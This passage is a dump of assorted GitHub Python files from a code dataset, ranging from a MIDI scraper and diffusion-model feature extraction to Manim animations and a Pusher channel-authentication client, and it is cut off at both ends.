\"midi-download\")]/a/@href').getall()\n yield {\n 'name': section_name,\n 'urls': midi_urls\n }\n\ndef fetch_midi_urls(export_name=MIDI_URL_JSON):\n if os.path.isfile(export_name):\n os.remove(export_name)\n process = CrawlerProcess(\n settings={\n \"FEEDS\": {\n export_name: {\"format\": \"json\"},\n },\n }\n )\n process.crawl(synthesiamaniacDL)\n process.start()\n process.join()\n\ndef download_midis(midi_url_json=MIDI_URL_JSON, dl_dir=DL_DIR, dl_instances=DL_INSTANCES):\n print('Starting to download the MIDIs now...')\n downloader_pool = Pool(dl_instances)\n with open(midi_url_json, 'rb') as infile:\n midi_url_map = json.load(infile)\n for section in midi_url_map:\n section_dir = os.path.join(dl_dir, section['name'])\n os.makedirs(section_dir, exist_ok=True)\n for url in section['urls']:\n midi_path = os.path.join(section_dir, url[url.rfind('/')+1:])\n if not os.path.isfile(midi_path):\n downloader_pool.apply(download_file, (url, midi_path))\n downloader_pool.close()\n downloader_pool.join()\n print('All MIDIs have been downloaded!')\n\ndef download_file(url, path, retry=3):\n print(\"Downloading: \" + url + \" to \" + path)\n attempts = 0\n while attempts < retry:\n try:\n r = requests.get(url, allow_redirects=True, timeout=5, stream=True)\n if r.status_code == 200:\n size = int(r.headers.get('Content-Length'))\n with open(path+\".part\", 'wb') as f:\n for chunk in r.iter_content(chunk_size=1024):\n f.write(chunk)\n os.rename(path+\".part\", path)\n print(\"Downloaded: \" + path)\n break\n else: attempts += 1\n except Exception as e:\n attempts += 1\n print(e)\n if attempts == retry - 1:\n print(\"Could not download: \" + url)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"retrontology/scrapy-downloaders","sub_path":"sythensia-maniac/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"40465816502","text":"from typing import Any\nfrom typing import Dict\n\nDEFAULT_ENDPOINT_URL = \"/20160918\"\n\n\nasync def gather(hub, profiles) -> Dict[str, Any]:\n sub_profiles = {}\n for (\n profile,\n ctx,\n ) in profiles.get(\"oci\", {}).items():\n endpoint_url = f\"{ctx.get('endpoint_url').replace('{region_name}', ctx.get('region')).rstrip(DEFAULT_ENDPOINT_URL)}{DEFAULT_ENDPOINT_URL}\"\n sub_profiles[profile] = dict(\n endpoint_url=endpoint_url,\n compartment_id=ctx.get(\"compartment\"),\n api_key=f\"{ctx.get('tenancy_ocid')}/{ctx.get('user_ocid')}/{ctx.get('fingerprint')}\",\n )\n return sub_profiles\n","repo_name":"35thelement/bromine-oci-idem","sub_path":"idem_oci_instance/acct/oci/default_auth.py","file_name":"default_auth.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4086920936","text":"import sys\nimport torch\nfrom torch import nn\nfrom typing import List\nfrom diffusion_utils.diffusion_multinomial import index_to_log_onehot,log_onehot_to_index\n\n\n# device = 'cuda' if torch.cuda.is_available() else 'cpu'\n\ndef create_feature_extractor(model_type, **kwargs):\n \"\"\" Create the feature extractor for architecture. \"\"\"\n if model_type == 'ddpm':\n print(\"Creating DDPM Feature Extractor...\")\n feature_extractor = FeatureExtractorDDPM(**kwargs)\n # elif model_type == 'mae':\n # print(\"Creating MAE Feature Extractor...\")\n # feature_extractor = FeatureExtractorMAE(**kwargs)\n # elif model_type == 'swav':\n # print(\"Creating SwAV Feature Extractor...\")\n # feature_extractor = FeatureExtractorSwAV(**kwargs)\n # elif model_type == 'swav_w2':\n # print(\"Creating SwAVw2 Feature Extractor...\")\n # feature_extractor = FeatureExtractorSwAVw2(**kwargs)\n else:\n raise Exception(f\"Wrong model type: {model_type}\")\n return feature_extractor\n\ndef save_tensors(module: nn.Module, features, name: str):\n \"\"\" Process and save activations in the module. \"\"\"\n if type(features) in [list, tuple]:\n features = [f.detach().float() if f is not None else None \n for f in features]\n setattr(module, name, features)\n elif isinstance(features, dict):\n features = {k: f.detach().float() for k, f in features.items()}\n setattr(module, name, features)\n else:\n setattr(module, name, features.detach().float())\n\n\ndef save_out_hook(self, inp, out):\n save_tensors(self, out, 'activations')\n return out\n\n\ndef save_input_hook(self, inp, out):\n save_tensors(self, inp[0], 'activations')\n return out\n\nclass FeatureExtractor(nn.Module):\n def __init__(self, model_path: str, input_activations: bool, **kwargs):\n ''' \n Parent feature extractor class.\n \n param: model_path: path to the pretrained model\n param: input_activations: \n If True, features are input activations of the corresponding blocks\n If False, features are output activations of the corresponding blocks\n '''\n super().__init__()\n self._load_pretrained_model(model_path, **kwargs)\n print(f\"Pretrained model is successfully loaded from {model_path}\")\n self.save_hook = save_input_hook if input_activations else save_out_hook\n self.feature_blocks = []\n\n def _load_pretrained_model(self, model_path: str, **kwargs):\n pass\n\nclass FeatureExtractorDDPM(FeatureExtractor):\n ''' \n Wrapper to extract features from pretrained DDPMs.\n \n :param steps: list of diffusion steps t.\n :param blocks: list of the UNet decoder blocks.\n '''\n \n def __init__(self, steps: List[int], blocks: List[int], **kwargs):\n super().__init__(**kwargs)\n self.steps = steps\n \n # Save decoder activations\n for idx, block in enumerate(self.model._denoise_fn.ups):\n print(idx)\n if idx in blocks:\n block[2].register_forward_hook(self.save_hook)\n self.feature_blocks.append(block[2])\n for idx, block in enumerate([self.model._denoise_fn.mid_block2]):\n print(idx)\n if idx in blocks:\n block.register_forward_hook(self.save_hook)\n self.feature_blocks.append(block)\n \n\n def _load_pretrained_model(self, model_path, **kwargs):\n from layers.layers import SegmentationUnet\n from diffusion_utils.diffusion_multinomial import MultinomialDiffusion\n\n # models: UNet and Diffusion \n # UNet is used to gather activations\n # Diffusion is used to get noisy samples\n unet = SegmentationUnet(\n num_classes=kwargs['num_classes'],\n dim=kwargs['dim'],\n num_steps=kwargs['num_steps'],\n dim_mults=kwargs['dim_mults']\n )\n\n self.model = MultinomialDiffusion(\n num_classes=kwargs['num_classes'],\n shape=kwargs['shape'],\n denoise_fn=unet,\n timesteps=kwargs['num_steps']\n ).to(kwargs['device'])\n\n dict = torch.load(model_path)\n self.model.load_state_dict(dict['model'])\n self.model.eval()\n\n @torch.no_grad()\n def forward(self, x, noise=None):\n activations = []\n for t in self.steps:\n # Compute x_t and run DDPM\n t = torch.tensor([t]).to(x.device)\n log_x_start = index_to_log_onehot(x, num_classes=2)\n log_x_t = self.model.q_sample(log_x_start=log_x_start, t=t)\n x_t = log_onehot_to_index(log_x_t)\n \n self.model._denoise_fn(x=x_t, time=t)\n\n # Extract activations\n for block in self.feature_blocks:\n activations.append(block.activations)\n block.activations = None\n\n # Per-layer list of activations [N, C, H, W]\n return activations\n \n\ndef collect_features(args, activations: List[torch.Tensor], sample_idx=0):\n \"\"\" Upsample activations and concatenate them to form a feature tensor \"\"\"\n assert all([isinstance(acts, torch.Tensor) for acts in activations])\n size = tuple(args['shape'][1:])\n resized_activations = []\n for feats in activations:\n feats = feats[sample_idx][None]\n feats = nn.functional.interpolate(\n feats, size=size, mode=args[\"upsample_mode\"]\n )\n resized_activations.append(feats[0])\n \n return torch.cat(resized_activations, dim=0)","repo_name":"gracious-patience/voxel_segmentation","sub_path":"multinomial_diffusion/segmentation_diffusion/src/feature_extractor.py","file_name":"feature_extractor.py","file_ext":"py","file_size_in_byte":5574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33406274504","text":"from ulakbus.models import Ceza\nfrom zengine.lib.test_utils import BaseTestCase\nfrom ulakbus.models import Personel\n\n\nclass TestCase(BaseTestCase):\n\n def test_idari_cezalar_takibi(self):\n personel_id = \"OI3vq7rWIaTdSNUj4KwSBpeHMrc\"\n personel = Personel.objects.get(personel_id)\n\n self.prepare_client('/idari_cezalar_takibi', username='personel_isleri_1')\n self.client.post(id=personel_id, model=\"Ceza\", param=\"personel_id\", wf=\"idari_cezalar_takibi\")\n\n\n ceza_sayisi = Ceza.objects.filter(personel = personel).count()\n\n # Yeni Ceza Ekleme\n\n self.client.post(form={\"add\": 1}, cmd='add_edit_form')\n resp = self.client.post(form={\"iptal\": 1}, cmd='iptal')\n assert resp.json['forms']['schema']['title'] == 'İdari Cezalar'\n assert Ceza.objects.filter(personel=personel).count() == ceza_sayisi\n\n resp = self.client.post(form={\"add\": 1}, cmd='add_edit_form')\n\n assert resp.json['forms']['schema']['title'] == 'İdari Ceza'\n\n yeni_idari_ceza_form = {'acilis_tarihi': \"17.01.2017\",\n 'baslama_tarihi': \"17.01.2017\",\n 'bitis_tarihi': \"18.01.2017\",\n 'dosya_sira_no': \"12345\",\n 'ihbar_sikayet_suc_ogrenildigi_tarih': \"10.01.2017\",\n 'kararin_teblig_tarihi': \"19.01.2017\",\n 'dusunceler': \"Dusunce Denemesi\",\n 'kaydet': 1}\n\n resp = self.client.post(form=yeni_idari_ceza_form)\n assert resp.json['msgbox']['title'] == \"İdari Ceza Oluşturuldu\"\n assert yeni_idari_ceza_form['dosya_sira_no'] in resp.json['msgbox']['msg']\n assert 'oluşturuldu' in resp.json['msgbox']['msg']\n\n assert Ceza.objects.filter(personel=personel).count() == ceza_sayisi + 1\n\n ceza_object = Ceza.objects.filter(personel=personel, dosya_sira_no='12345')[0]\n\n # Ceza Bilgilerini Düzenleme\n\n self.client.post(id=personel_id, model=\"Ceza\", param=\"personel_id\",\n object_id=ceza_object.key, wf=\"idari_cezalar_takibi\",\n cmd=\"add_edit_form\")\n\n resp = self.client.post(form={\"iptal\": 1}, cmd='iptal')\n assert resp.json['forms']['schema']['title'] == 'İdari Cezalar'\n assert Ceza.objects.filter(personel=personel).count() == ceza_sayisi + 1\n\n yeni_idari_ceza_form['dusunceler'] = \"Deneme Dusuncesi\"\n yeni_idari_ceza_form['object_key'] = ceza_object.key\n\n resp = self.client.post(id=personel_id, model=\"Ceza\", param=\"personel_id\",\n object_id=ceza_object.key, wf=\"idari_cezalar_takibi\",\n cmd=\"add_edit_form\")\n\n assert resp.json['forms']['schema']['title'] == 'İdari Ceza'\n assert resp.json['forms']['model']['dusunceler'] == 'Dusunce Denemesi'\n\n resp = self.client.post(cmd = 'add_edit_form',\n form=yeni_idari_ceza_form,\n model=\"Ceza\",\n wf=\"idari_cezalar_takibi\")\n\n assert resp.json['msgbox']['title'] == \"Değişiklikleriniz Kaydedildi\"\n assert personel.__unicode__() in resp.json['msgbox']['msg']\n assert 'kaydedildi' in resp.json['msgbox']['msg']\n\n assert Ceza.objects.filter(personel=personel).count() == ceza_sayisi + 1\n\n # Ceza Bilgilerini Görüntüleme\n\n resp = self.client.post(id=personel_id, model=\"Ceza\", param=\"personel_id\",\n object_id=ceza_object.key, wf=\"idari_cezalar_takibi\",\n cmd=\"goruntule\")\n\n assert personel.__unicode__() and ceza_object.dosya_sira_no in resp.json['object_title']\n assert 'Deneme Dusuncesi' in resp.json['object'].values()\n assert resp.json['object']['Dosya No'] == ceza_object.dosya_sira_no\n\n resp = self.client.post(form={\"tamam\": 1}, cmd='iptal')\n\n assert resp.json['forms']['schema']['title'] == 'İdari Cezalar'\n assert Ceza.objects.filter(personel=personel).count() == ceza_sayisi + 1\n\n # Ceza Silme\n\n self.client.post(id=personel_id, model=\"Ceza\", param=\"personel_id\",\n object_id=ceza_object.key, wf=\"idari_cezalar_takibi\",\n cmd=\"delete\")\n\n resp = self.client.post(form={\"hayir\": 1}, cmd='iptal')\n assert resp.json['forms']['schema']['title'] == 'İdari Cezalar'\n assert Ceza.objects.filter(personel=personel).count() == ceza_sayisi + 1\n\n resp = self.client.post(id=personel_id, model=\"Ceza\", param=\"personel_id\",\n object_id=ceza_object.key, wf=\"idari_cezalar_takibi\",\n cmd=\"delete\")\n\n assert resp.json['forms']['schema']['title'] == \"İdari Ceza Silme İşlemi\"\n assert personel.ad in resp.json['forms']['form'][0]['helpvalue']\n assert yeni_idari_ceza_form['dosya_sira_no'] in resp.json['forms']['form'][0]['helpvalue']\n\n resp = self.client.post(form={\"evet\": 1}, cmd='delete')\n resp.json['msgbox']['title'] = \"Silme İşlemi Başarılı\"\n assert personel.__unicode__() in resp.json['msgbox']['msg']\n assert yeni_idari_ceza_form['dosya_sira_no'] in resp.json['msgbox']['msg']\n assert 'silindi' in resp.json['msgbox']['msg']\n assert Ceza.objects.filter(personel=personel).count() == ceza_sayisi\n\n ceza_object.blocking_delete()","repo_name":"zetaops/ulakbus","sub_path":"tests/test_idari_cezalar_takibi.py","file_name":"test_idari_cezalar_takibi.py","file_ext":"py","file_size_in_byte":5379,"program_lang":"python","lang":"tr","doc_type":"code","stars":101,"dataset":"github-code","pt":"48"} +{"seq_id":"73726486224","text":"\"\"\"sevilla_vuela URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom main import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', views.inicio),\n path('inicio/', views.inicio),\n path('inicio.html/', views.inicio),\n path('about_us/', views.about),\n path('vuelos/', views.listar_vuelos),\n path('llegadas/', views.listar_llegadas),\n path('salidas/', views.listar_salidas),\n path('codeshare/', views.codigo_vuelos),\n path('aerolineas/', views.listar_aerolineas),\n path('aerolineas/', views.listar_llegadas_salidas),\n path('refresh/', views.refrescar),\n\n]\n","repo_name":"alexaur97/sevilla_vuela","sub_path":"sevilla_vuela/sevilla_vuela/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22070880822","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[35]:\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm_notebook as tqdm\n\n\n# In[36]:\n\n\nnum_states = 7\nterminal_states = [0, 6]\nalpha = 0.1\nstart_state = 3\nnum_episodes = 101\ndiscount = 1\ntrue_values = np.arange(0, 7)\ntrue_values = true_values/6\ntrue_values[6] = 0\n\n\n# In[37]:\n\n\ndef initializeV():\n V = np.zeros(num_states)\n for i in range(num_states):\n if i in terminal_states:\n continue\n V[i] = 0.5\n return V\n\ndef choose_action():\n prob = np.random.random()\n if (prob > 0.5):\n return 1\n return -1\n\ndef take_step(s, action):\n new_s = s + action\n if new_s == 6:\n return new_s, 1\n return new_s, 0\n\n\n# In[38]:\n\n\ndef td0(num_episodes):\n# print(alpha)\n V = initializeV()\n rmse_episode = np.zeros(num_episodes)\n for i in range(num_episodes):\n if i in episodes:\n plt.plot(V[1:6], label = str(i))\n s = start_state\n while True:\n action = choose_action()\n s_dash, reward = take_step(s, action)\n V[s] += alpha*(reward + discount*V[s_dash] - V[s])\n s = s_dash\n if s in terminal_states: \n break\n rmse_episode[i] = np.sqrt(np.sum(np.power(true_values - V, 2))/5.0)\n return rmse_episode\n\n\n# In[42]:\n\n\nepisodes = [0, 1, 10, 100]\nV = initializeV()\ntrue_values = np.arange(0, 7)\ntrue_values = true_values/6\ntrue_values[6] = 0\nplt.figure()\nplt.plot(true_values[1:6], label = \"True\")\ntd0(101)\nplt.legend()\nplt.show()\n\n\n# In[43]:\n\n\narr_td = []\nnum_runs = 100\nepisodes = [0, 1, 10, 100]\nalpha_array_td = [0.1, 0.15, 0.05]\nplt.figure()\nfor alpha_ in alpha_array_td:\n rmse_runs = np.zeros(num_episodes)\n alpha = alpha_\n for run in range(num_runs): \n rmse = td0(num_episodes)\n rmse_runs += rmse\n rmse_runs/=num_runs\n arr_td.append(rmse_runs)\n\n\n# In[44]:\n\n\ndef alpha_mc(num_episodes):\n# print(alpha)\n V = initializeV()\n rmse_episode = np.zeros(num_episodes)\n for i in range(num_episodes):\n episode_cache = []\n s = start_state\n# episode_cache.append(s)\n while True:\n action = choose_action()\n s_dash, reward = take_step(s, action)\n episode_cache.append(s)\n s = s_dash\n if s in terminal_states: \n break\n g = 0\n if (episode_cache[-1] == 6):\n g = 1\n for state in episode_cache:\n V[state] += alpha * (reward - V[state])\n rmse_episode[i] = np.sqrt(np.sum(np.power(true_values - V, 2))/5.0)\n return rmse_episode\n\n\n# In[45]:\n\n\narr = []\nnum_runs = 100\nalpha_array_mc = [0.01, 0.02, 0.03, 0.04]\nfor alpha_ in alpha_array_mc:\n rmse_runs = np.zeros(num_episodes)\n alpha = alpha_\n for run in range(num_runs): \n rmse = alpha_mc(num_episodes)\n# print(x)\n rmse_runs += rmse\n rmse_runs/=num_runs\n arr.append(rmse_runs)\n\n\n# In[48]:\n\n\nplt.figure()\nnum = 0\nfor rmse in arr:\n plt.plot(rmse, label = \"MC alpha = \" + str(alpha_array_mc[num]))\n num += 1\nnum = 0\nfor rmse in arr_td:\n plt.plot(rmse, label = \"TD alpha = \" + str(alpha_array_td[num]))\n num += 1\nplt.legend()\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"abhishekag03/RL-M2019","sub_path":"HW3/q6.py","file_name":"q6.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73785470547","text":"import os\nimport argparse\nimport open3d as o3d\nfrom tqdm import tqdm\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--filedir', required=True)\n parser.add_argument('--max_display')\n args = parser.parse_args()\n\n files = os.listdir(str(args.filedir))\n files = sorted(files)\n\n if args.max_display is None:\n max_display = int(10)\n else:\n max_display = int(args.max_display)\n\n if len(files) >= max_display:\n files = files[:max_display]\n\n meshes = []\n \n for idx, file in tqdm(enumerate(files)):\n filepath = os.path.join(str(args.filedir), file)\n mesh = o3d.io.read_triangle_mesh(filepath)\n mesh.compute_vertex_normals()\n mesh.compute_triangle_normals()\n mesh.paint_uniform_color([0.5, 0.5, 0.5])\n mesh = mesh.translate((((idx % 5) * 0.3), ((idx // 5) * 0.35 * (-1)), 0))\n meshes.append(mesh)\n \n o3d.visualization.draw_geometries(meshes, mesh_show_back_face=True)\n","repo_name":"ariefpurnamamuharram/IF5171_Open3D","sub_path":"visualizer_mesh.py","file_name":"visualizer_mesh.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4776244046","text":"__author__ = 'sen'\n\nimport os\n\nfrom flask import Flask, make_response\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n \"\"\"\n\n \"\"\"\n current_dir = os.path.dirname(__file__)\n current_dir_abs = os.path.abspath(current_dir)\n app_path = os.path.join(current_dir_abs, 'index.html')\n\n assert os.path.exists(app_path), 'Does not exist: %s' % app_path\n return make_response(open(app_path).read())\n","repo_name":"lejkos/sunshine","sub_path":"test/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30272615560","text":"#!/usr/bin/env python3\n\n\"\"\"Simple code for get a contour from a 2D grid of points.\"\"\"\n\nimport copy\nfrom matplotlib import pyplot as plt\n\n\ndef getContour(xpts,ypts,zpts,levels):\n \"\"\"\n Use pyplot tricontour method to obtain contour curves in a 2D plane.\n\n :return: A dictionary with a list of contours for each level\n \"\"\"\n fig = plt.figure()\n x = copy.deepcopy(xpts)\n y = copy.deepcopy(ypts)\n z = copy.deepcopy(zpts)\n CS = plt.tricontour(x,y,z,levels=levels)\n levelPts = {}\n for il,level in enumerate(CS.levels):\n levelPts[level] = []\n c = CS.collections[il]\n paths = c.get_paths()\n for path in paths:\n levelPts[level].append(path.vertices)\n plt.close(fig)\n\n return levelPts\n","repo_name":"andlessa/RDM","sub_path":"myCheckMate2Files/validation/validation_plots/getContour.py","file_name":"getContour.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32195900936","text":"from manim import *\n\n\nclass OtherQuad(Scene):\n def construct(self):\n other = Text('The other quadratic equation:').shift(UP*2)\n other_quad = MathTex(r'\\frac{\\frac{-b}{2}\\pm\\sqrt{\\frac{b^2}{4}-ac}}{a}')\n self.play(Write(other))\n self.wait(1)\n self.play(Write(other_quad))\n other_quad2 = MathTex(r' = \\frac{\\frac{-b}{2}\\pm\\sqrt{\\frac{1}{4}(b^2-4ac)}}{a}').next_to(other_quad)\n self.play(Write(other_quad2))\n gr = VGroup(other_quad, other_quad2)\n self.play(gr.animate.shift(LEFT*5))\n other_quad3 = MathTex(r'= \\frac{\\frac{-b}{2}\\pm\\frac{1}{2}\\sqrt{b^2-4ac}}{a}').next_to(gr)\n self.play(Write(other_quad3))\n other_quad3_1 = MathTex(r'= \\frac{\\frac{-b}{2}\\pm\\frac{\\sqrt{b^2-4ac}}{2}}{a}').next_to(gr)\n self.play(TransformMatchingTex(other_quad3, other_quad3_1))\n other_quad4 = MathTex(r' = \\frac{-b\\pm\\sqrt{b^2-4ac}}{2a}').shift(DOWN*2)\n self.play(Write(other_quad4))\n\nclass Conclusion(Scene):\n def construct(self):\n conc = Text('Therefore, the other one works as well,\\n and is easier for even b\\'s.')\n self.play(Write(conc))\n\nclass SimplerQuad(Scene):\n def construct(self):\n quad = MathTex(r'ax^2 + bx + c').shift(UP*3)\n self.play(Write(quad))\n self.play(quad.animate.shift(LEFT*2))\n self.wait(1)\n quad2 = MathTex(r\"= x^2 + b'x + c'\").next_to(quad)\n self.play(Write(quad2))\n deriv = MathTex(r\"(x-r)(x-s) = 0\")\n deriv1 = MathTex(r\"x^2 - (r+s)x + rs = 0\").shift(DOWN)\n self.play(Write(deriv))\n self.wait(1)\n self.play(Write(deriv1))\n self.wait(1)\n derivgroup = VGroup(deriv, deriv1)\n self.play(derivgroup.animate.shift(UP*2))\n therefore = Tex('Therefore, ').set_color_by_tex('Therefore', BLUE)\n self.play(Write(therefore))\n bprime = MathTex(r\"-(r+s) = b'\").shift(DOWN)\n cprime = MathTex(r\"rs = c'\").shift(DOWN*2)\n self.play(Write(bprime))\n self.wait(1)\n self.play(Write(cprime))\n primegroup = VGroup(bprime, cprime)\n rect = SurroundingRectangle(primegroup)\n primegroup2 = VGroup(primegroup, rect)\n self.play(Create(rect))\n self.play(Uncreate(therefore))\n self.play(Unwrite(deriv))\n self.play(Unwrite(deriv1))\n self.play(Unwrite(quad))\n self.play(Unwrite(quad2))\n self.play(primegroup2.animate.shift(UP*4))\n\nclass Visual(Scene):\n def construct(self):\n plane = NumberPlane(\n axis_config={\n \"label_direction\": DL - (3 * LEFT / 4)\n },\n y_axis_config={\n \"label_direction\": DL\n },\n faded_line_ratio=2\n )\n plane.add_coordinates()\n self.add(plane)\n self.wait(1)\n graph = plane.plot(lambda x: x**2 - 4, x_range=[-6, 6], use_smoothing=False, color=BLUE)\n self.play(Create(graph))\n coordinate = Dot(point=ORIGIN).shift(RIGHT*2)\n label = Text('s').next_to(coordinate).shift(DOWN*0.2, LEFT*0.2)\n self.play(Create(coordinate))\n self.play(Write(label))\n self.wait(1)\n coordinate2 = Dot(point=ORIGIN).shift(LEFT*2)\n label2 = Text('r').next_to(coordinate2).shift(DOWN*0.3, LEFT*0.7)\n self.play(Create(coordinate2))\n self.play(Write(label2))\n coordinate3 = Dot(point=ORIGIN)\n label3 = Text('m').next_to(coordinate3).shift(DOWN*0.5)\n self.play(Create(coordinate3))\n self.play(Write(label3))\n braceline = Line(coordinate3, coordinate)\n bracelabel= BraceLabel(braceline, 'm+d', UP)\n braceline2 = Line(coordinate3, coordinate2)\n bracelabel2 = BraceLabel(braceline2, 'm-d', UP)\n self.play(Create(bracelabel))\n self.play(Create(bracelabel2))\n sols = MathTex(r\"(m-d)(m+d) = c'\").shift(UP*2, RIGHT*4.6)\n sols2 = MathTex(r\"= m^2 - d^2 = c'\").shift(UP, RIGHT*4.5)\n sols2_1 = MathTex(r\"d^2 = m^2 - c'\").shift(UP, RIGHT*4.5)\n self.play(Write(sols))\n self.play(Write(sols2))\n self.play(ReplacementTransform(sols2, sols2_1))\n sols2_2 = MathTex(r\"d = \\sqrt{m^2 - c}\").shift(UP, RIGHT*4.5)\n self.play(ReplacementTransform(sols2_1, sols2_2))\n m = MathTex(r\"m = \\frac{r+s}{2}\").shift(DOWN, RIGHT*4.5)\n self.play(Write(m))\n m2 = MathTex(r\"m = \\frac{-b'}{2}\").shift(DOWN, RIGHT*4.5)\n self.play(ReplacementTransform(m, m2))\n x = MathTex(r\"x = m \\pm d\").shift(DOWN*2, RIGHT*4.5)\n self.play(Write(x))\n simpquad = VGroup(m2, x, sols2_2)\n quadrect = SurroundingRectangle(simpquad)\n self.play(Create(quadrect))\n","repo_name":"Sri-SriPod/manimations","sub_path":"quadratic.py","file_name":"quadratic.py","file_ext":"py","file_size_in_byte":4696,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"20709493338","text":"from util.local import *\nimport pygame\nfrom base.view import *\n\nclass MoveAble:\n \"\"\"\n 可以移动的控件: 我方坦克 和 敌方坦克 子弹\n 功能:\n 1.碰撞检测\n 2.通知运动物和阻挡物\n \"\"\"\n def hasCollision(self,block):\n\n # 记录当前的坐标\n x = self.x\n y = self.y\n\n # 预判下一步的轨迹\n # 预判下一步\n if self.direction == Direction.UP:\n y -= self.speed\n elif self.direction == Direction.DOWN:\n y += self.speed\n elif self.direction == Direction.LEFT:\n x -= self.speed\n elif self.direction == Direction.RIGHT:\n x += self.speed\n\n # 坦克矩形\n selfRect = pygame.Rect(x,y,self.width,self.height)\n # block矩形\n blockRect = pygame.Rect(block.x,block.y,block.width,block.height)\n\n\n # 同时对越界进行处理\n return selfRect.colliderect(blockRect) or x <0 or y<0 or x> WIDTH-self.width or y> HEIGHT - self.height\n\n\n def notifyCollision(self):\n pass","repo_name":"lq-debuger/TankGame","sub_path":"base/move.py","file_name":"move.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74318741266","text":"import numpy as np\nimport sys\n\n\nin_base_path = 'data/mnist/'\nout_base_path = 'data/mnist/'\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 4:\n print('Usage: ')\n exit(1)\n if len(sys.argv) >= 4:\n data_file_name = sys.argv[1]\n label_file_name = sys.argv[2]\n out_file_name = sys.argv[3]\n\n\ndata_path = in_base_path + data_file_name\nlabel_path = in_base_path + label_file_name\nout_path = out_base_path + out_file_name\n\n\ndef prepare_mnist_encoded(data_path, label_path, out_path):\n data = np.loadtxt(data_path)\n label = np.loadtxt(label_path)\n label = np.reshape(label, (label.shape[0], 1))\n encoded_mnist = np.concatenate((data, label), axis=1)\n np.savetxt(out_path, encoded_mnist)\n print('done')\n\n\nprepare_mnist_encoded(data_path, label_path, out_path)\n\n","repo_name":"mamiriqbal1/autoencoder","sub_path":"prepare_encoded_mnist_xcs-img.py","file_name":"prepare_encoded_mnist_xcs-img.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17731520913","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import (\n print_function,\n unicode_literals,\n absolute_import,\n division)\n\nimport collections\nimport hashlib\nimport json\nimport os\nimport re\nimport six\nimport time\nimport base64\n\nfrom pusher.util import (\n ensure_text,\n ensure_binary,\n validate_channel,\n validate_socket_id,\n channel_name_re\n )\n\nfrom pusher.client import Client\nfrom pusher.http import GET, POST, Request, request_method\nfrom pusher.signature import sign, verify\nfrom pusher.crypto import *\n\n\nclass AuthenticationClient(Client):\n def __init__(\n self,\n app_id,\n key,\n secret,\n ssl=True,\n host=None,\n port=None,\n timeout=5,\n cluster=None,\n encryption_master_key=None,\n encryption_master_key_base64=None,\n json_encoder=None,\n json_decoder=None,\n backend=None,\n **backend_options):\n\n super(AuthenticationClient, self).__init__(\n app_id,\n key,\n secret,\n ssl,\n host,\n port,\n timeout,\n cluster,\n encryption_master_key,\n encryption_master_key_base64,\n json_encoder,\n json_decoder,\n backend,\n **backend_options)\n\n\n def authenticate(self, channel, socket_id, custom_data=None):\n \"\"\"Used to generate delegated client subscription token.\n\n :param channel: name of the channel to authorize subscription to\n :param socket_id: id of the socket that requires authorization\n :param custom_data: used on presence channels to provide user info\n \"\"\"\n channel = validate_channel(channel)\n\n if not channel_name_re.match(channel):\n raise ValueError('Channel should be a valid channel, got: %s' % channel)\n\n socket_id = validate_socket_id(socket_id)\n\n if custom_data:\n custom_data = json.dumps(custom_data, cls=self._json_encoder)\n\n string_to_sign = \"%s:%s\" % (socket_id, channel)\n\n if custom_data:\n string_to_sign += \":%s\" % custom_data\n\n signature = sign(self.secret, string_to_sign)\n\n auth = \"%s:%s\" % (self.key, signature)\n response_payload = { \"auth\": auth }\n\n if is_encrypted_channel(channel):\n shared_secret = generate_shared_secret(\n ensure_binary(channel, \"channel\"), self._encryption_master_key)\n shared_secret_b64 = base64.b64encode(shared_secret)\n response_payload[\"shared_secret\"] = shared_secret_b64\n\n if custom_data:\n response_payload['channel_data'] = custom_data\n\n return response_payload\n\n\n def validate_webhook(self, key, signature, body):\n \"\"\"Used to validate incoming webhook messages. When used it guarantees\n that the sender is Pusher and not someone else impersonating it.\n\n :param key: key used to sign the body\n :param signature: signature that was given with the body\n :param body: content that 